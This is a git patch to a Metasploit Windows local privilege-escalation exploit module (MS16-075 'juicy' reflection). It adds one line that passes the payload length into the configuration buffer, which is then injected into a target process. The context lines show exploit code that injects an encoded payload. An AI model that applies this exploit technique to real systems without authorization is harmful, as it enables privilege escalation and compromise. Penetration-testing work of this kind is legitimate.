From dca99552e62916c16b30e26509a38eb7113af6b9 Mon Sep 17 00:00:00 2001
From: phra <greensoncio@gmail.com>
Date: Fri, 11 Jan 2019 16:28:49 +0100
Subject: [PATCH] feat: pass payload length to the dll

---
 modules/exploits/windows/local/ms16_075_reflection_juicy.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/exploits/windows/local/ms16_075_reflection_juicy.rb b/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
index dac07bf84b..7a5e44b560 100644
--- a/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
+++ b/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
@@ -169,6 +169,7 @@ class MetasploitModule < Msf::Exploit::Local
     configuration += "#{datastore['RPC_IP']}\x00"
     configuration += "#{datastore['RPC_PORT']}\x00"
     configuration += "#{datastore['DCOM_IP']}\x00"
+    configuration += "#{payload.encoded.length}\x00"
     configuration += payload.encoded
     payload_mem = inject_into_process(process, configuration)
     # invoke the exploit, passing in the address of the payload that